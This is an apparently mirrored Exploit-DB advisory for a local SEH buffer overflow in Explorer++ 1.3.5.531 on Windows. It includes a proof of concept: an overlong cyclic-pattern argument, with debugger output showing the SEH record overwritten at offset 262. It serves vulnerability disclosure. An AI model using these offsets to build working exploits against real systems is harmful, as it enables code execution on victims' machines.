Explorer32++ v1.3.5.531 – Buffer overflow

• Exploit Database
• 39 阅读

• 作者： Rafael Pedrero
  日期： 2023-03-27
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51077/

• # Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow
  # Discovery by: Rafael Pedrero
  # Discovery Date: 2022-01-09
  # Vendor Homepage: http://www.explorerplusplus.com/
  # Software Link : http://www.explorerplusplus.com/
  # Tested Version: 1.3.5.531
  # Tested on:Windows 10
  
  CVSS v3: 7.3
  CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
  CWE: CWE-119
  
  Buffer overflow controlling the Structured Exception Handler (SEH) records
  in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers
  to execute arbitrary code via a long file name argument.
  
  Proof of concept:
  
  Open Explorer32++.exe from command line with a large string in Arguments,
  more than 396 chars:
  
  File '<Explorer++_PATH>\Explorer32++.exe'
  Arguments
  'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'
  
  SEH chain of main thread
  AddressSE handler
  0018FB14 00690041
  00370069 *** CORRUPT ENTRY ***
  
  0BADF00D [+] Examining SEH chain
  0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with
  unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic
  data after the handler